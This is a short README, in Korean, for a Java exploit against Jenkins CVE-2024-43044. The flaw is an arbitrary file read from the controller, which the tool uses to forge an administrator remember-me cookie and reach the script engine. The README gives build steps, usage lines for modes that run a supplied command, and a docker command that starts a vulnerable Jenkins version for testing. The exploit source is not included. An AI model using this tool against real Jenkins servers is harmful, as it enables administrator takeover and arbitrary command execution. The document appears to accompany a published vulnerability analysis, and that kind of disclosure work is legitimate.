
Jenkins의 취약점 CVE-2024-43044에 대한 익스플로잇
이것은 CVE-2024-43044에 대한 익스플로잇입니다. 이 취약점은 에이전트가 컨트롤러에서 파일을 가져올 수 있도록 하는 임의 파일 읽기입니다.
이 익스플로잇은 취약점을 이용해 파일을 읽어 관리자 계정의 remember-me 쿠키를 위조하고 Jenkins 스크립팅 엔진에 접근 권한을 얻습니다.
전체 분석 내용은 https://blog.convioappsec.com/en/analysis-of-cve-2024-43044/ 에서 확인하세요.
mvn package
Exploit Usages:
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
java -jar exploit.jar mode_attach <jenkinsUrl> <cmd>
java -jar exploit.jar mode_attach <cmd>
다음과 같이 Docker를 사용해 취약한 버전에서 테스트할 수 있습니다:
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17
Jenkins가 실행 중이면 에이전트를 설정하세요.
컨트롤러/에이전트 연결은 기본(URL, 노드 이름, 시크릿 사용) 또는 SSH를 통해 가능합니다.
.